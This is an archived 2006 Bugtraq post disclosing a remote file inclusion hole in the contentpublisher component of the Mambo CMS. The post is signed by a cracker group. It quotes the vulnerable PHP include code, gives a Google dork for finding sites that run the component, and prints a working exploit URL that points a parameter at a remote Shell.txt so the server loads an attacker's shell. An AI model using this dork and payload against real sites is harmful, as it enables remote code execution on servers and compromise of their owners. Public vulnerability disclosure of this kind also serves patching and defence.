bugtraq - contentpublisher Mambo Component Remote File Include Vulnerabilities

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Message-ID: <20060817203857.16337.qmail@securityfocus.com>
Date: 17 Aug 2006 20:38:57 -0000
From: crackers_child@...ersavascilar.com
To: bugtraq@...urityfocus.com
Subject: contentpublisher Mambo Component Remote  File Include Vulnerabilities

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : contentpublisher Mambo Component Remote File Include Vulnerabilities

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child@...ersavascilar.com

--------------------------------------------------------------------------------

Google Dorks  : inurl:"/com_contentpublisher/"

------------------------- -------------------------------------------------------

Application :  contentpublisher/  Component of Mambo

--------------------------------------------------------------------------------

Bug &#304;n contentpublisher.php

global $my, $mosConfig_live_site, $mosConfig_lang;

if (file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php')) {
    include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php');
} else {
    include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/english.php');
} 

--------------------------------------------------------------------------------

Exploit:

http://[target]/[mambo_path]/components/contentpublisher/contentpublisher.php?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------

greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------


--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------